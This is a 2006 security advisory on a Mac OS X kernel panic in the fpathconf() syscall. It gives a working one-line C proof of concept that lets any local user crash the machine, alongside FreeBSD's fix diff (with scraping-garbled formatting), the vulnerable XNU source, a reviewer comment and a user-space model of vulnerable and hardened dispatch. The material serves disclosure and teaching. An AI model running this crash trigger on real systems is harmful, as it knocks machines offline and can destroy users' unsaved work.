SECURITYVULNS:DOC:15006
MOKB-09-11-2006
Published: Nov 11, 2006
Source: vulners.com

Title: Mac OS X fpathconf() syscall denial of service Warning - wet floor!
Description: Failure to handle unknown file types by the Mac OS X kernel (XNU) fpathconf() syscall causes a kernel panic, leading to an exploitable local denial of service by non-privileged users. The bug was fixed by FreeBSD on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found the issue and reported it to Apple some time ago (silently, yet only partially, fixed; thus still broken).
LMH <lmh[at]info-pull.com> - MOKB release, "proof of concept".
References:

Proof of concept or exploit: One-liner:

#include <fcntl.h>      /* O_CREAT (missing from the original one-liner) */
#include <semaphore.h>
#include <sys/stat.h>   /* S_IRWXU (missing from the original one-liner) */
#include <unistd.h>

int main(void) {
    /* sem_open() yields a POSIX semaphore descriptor, a file type the
       fpathconf() switch in xnu-792.6.76 has no case for, so the call
       falls into the default: panic() arm instead of getting an errno.
       On Mac OS X the sem_t * returned is in effect the descriptor
       number, which is why it is handed straight to fpathconf(). */
    fpathconf((int)(long)sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
    return 0;
}

Debugging information:

It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.

rome:~ lmh$ uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386

===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
— src/sys/kern/kern_descrip.c 2000/05/26 02:04:33 1.84
+++ src/sys/kern/kern_descrip.c 2000/06/27 23:08:36 1.85 <— 6 years, 4 months ago
@@ -36,7 +36,7 @@

  • SUCH DAMAGE.
  • @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
    • $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
    • $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
      */

#include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
return (VOP_PATHCONF(vp, uap->name, p->p_retval));

default:
  •   panic&#40;&quot;fpathconf&quot;&#41;;
    
  •   return &#40;EOPNOTSUPP&#41;;
    
    }
    /NOTREACHED/
    }
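Review bot: the `default:` arm now returns `EOPNOTSUPP` instead of calling `panic("fpathconf")`, which is the correct shape for this case: an unknown descriptor type is a condition the caller controls (any unprivileged process can create such a descriptor), not a broken kernel invariant, so it must be reported as an error rather than halt the machine. With the default arm returning, the `/* NOTREACHED */` comment immediately after the switch is stale and should be removed in the same change so it does not mislead the next reader into believing the switch is exhaustive.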

------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*
 * Return pathconf information about a file descriptor.
 */
int
fpathconf(p, uap, retval)
	struct proc *p;
	register struct fpathconf_args *uap;
	register_t *retval;
{
	int fd = uap->fd;
	struct fileproc *fp;
	struct vnode *vp;
	struct vfs_context context;
	int error = 0;
	short type;
	caddr_t data;

	AUDIT_ARG(fd, uap->fd);
	if ( (error = fp_lookup(p, fd, &fp, 0)) )
		return(error);
	type = fp->f_type;
	data = fp->f_data;

	switch (type) {

	case DTYPE_SOCKET:
		(…)
		error = 0;
		goto out;

	case DTYPE_PIPE:
		*retval = PIPE_BUF;
		error = 0;
		goto out;

	case DTYPE_VNODE:
		(…)
		goto out;

	case DTYPE_PSXSHM:
	case DTYPE_KQUEUE:
		error = EINVAL;
		goto out;

	default:
		panic("fpathconf (unrecognized - %d)", type);   <----- not covered cases, panic.
	}
	/* NOTREACHED */
out:
	fp_drop(p, fd, fp, 0);
	return(error);
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c
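The following is an added, user-space model of the dispatch pattern shown in the XNU excerpt above and in the FreeBSD diff; it is illustration code written for this page, not XNU, FreeBSD or MOKB code. It places the vulnerable shape (unlisted descriptor type reaches a default arm that panics) next to the hardened shape (unlisted type returns EOPNOTSUPP), and adds the check a kernel developer would want: a sweep over every type value that counts how many of them would have panicked. The enum names follow XNU's f_type constants, but their numeric values, the model_panic() stand-in, the MODEL_NAME_MAX stand-in for VOP_PATHCONF, and count_panicking_types() are all constructed here; DTYPE_PSXSEM is assumed to be the POSIX-semaphore type that sem_open() produces, which is not spelled out on the page.

```c
/* Added example: user-space model of fpathconf()'s descriptor-type dispatch.
 * Enum values, model_panic() and the sweep are constructed for this
 * illustration; none of this is XNU or FreeBSD code. */
#include <errno.h>
#include <limits.h>
#include <stdio.h>

#ifndef PIPE_BUF
#define PIPE_BUF 512            /* POSIX minimum, used only if <limits.h> lacks it */
#endif
#define MODEL_NAME_MAX 255      /* stand-in for what VOP_PATHCONF would report */

/* Descriptor types modelled on XNU's f_type values; the numbers are
 * constructed.  DTYPE_PSXSEM (POSIX semaphore, assumed to be what
 * sem_open() creates) is the type the 2006 switch had no case for. */
enum dtype {
    DTYPE_VNODE = 1, DTYPE_SOCKET, DTYPE_PSXSHM, DTYPE_PSXSEM,
    DTYPE_KQUEUE, DTYPE_PIPE, DTYPE_FSEVENTS,
    DTYPE_MODEL_LIMIT           /* one past the last modelled type */
};

/* In a kernel, panic() halts the machine.  The model records the call and
 * returns so the vulnerable dispatcher can be exercised by a test. */
static int model_panic_count = 0;
static void model_panic(const char *what)
{
    model_panic_count++;
    fprintf(stderr, "model panic: %s\n", what);
}

/* Vulnerable shape (as in xnu-792.6.76): any type the switch does not list
 * falls into the default arm, and the default arm panics. */
int fpathconf_vulnerable(enum dtype type, long *retval)
{
    switch (type) {
    case DTYPE_SOCKET: *retval = 0;              return 0;
    case DTYPE_PIPE:   *retval = PIPE_BUF;       return 0;
    case DTYPE_VNODE:  *retval = MODEL_NAME_MAX; return 0;
    case DTYPE_PSXSHM:
    case DTYPE_KQUEUE: return EINVAL;
    default:
        model_panic("fpathconf (unrecognized)");
        return -1;              /* never reached in a real kernel */
    }
}

/* Hardened shape (as in FreeBSD kern_descrip.c rev 1.85): an unlisted type
 * is a caller-controlled condition, so it gets an errno, not a panic. */
int fpathconf_hardened(enum dtype type, long *retval)
{
    switch (type) {
    case DTYPE_SOCKET: *retval = 0;              return 0;
    case DTYPE_PIPE:   *retval = PIPE_BUF;       return 0;
    case DTYPE_VNODE:  *retval = MODEL_NAME_MAX; return 0;
    case DTYPE_PSXSHM:
    case DTYPE_KQUEUE: return EINVAL;
    default:           return EOPNOTSUPP;
    }
}

/* Exhaustiveness check: drive a dispatcher with every type value, including
 * 0 and one value past the modelled range, and count the would-be panics.
 * Anything above zero is exactly the bug class this advisory describes. */
int count_panicking_types(int (*dispatch)(enum dtype, long *))
{
    int before = model_panic_count;
    long r = 0;
    for (int t = 0; t <= DTYPE_MODEL_LIMIT; t++)
        (void)dispatch((enum dtype)t, &r);
    return model_panic_count - before;
}

int main(void)
{
    printf("vulnerable dispatcher: %d panicking type(s)\n",
           count_panicking_types(fpathconf_vulnerable));
    printf("hardened dispatcher:   %d panicking type(s)\n",
           count_panicking_types(fpathconf_hardened));
    return 0;
}
```

The sweep is the useful part: a switch over a small closed type space should be checked against the whole space, not only the values the author remembered, and the vulnerable model reports four panicking values (0, the semaphore type, the later fsevents type, and the out-of-range value) where the hardened one reports none.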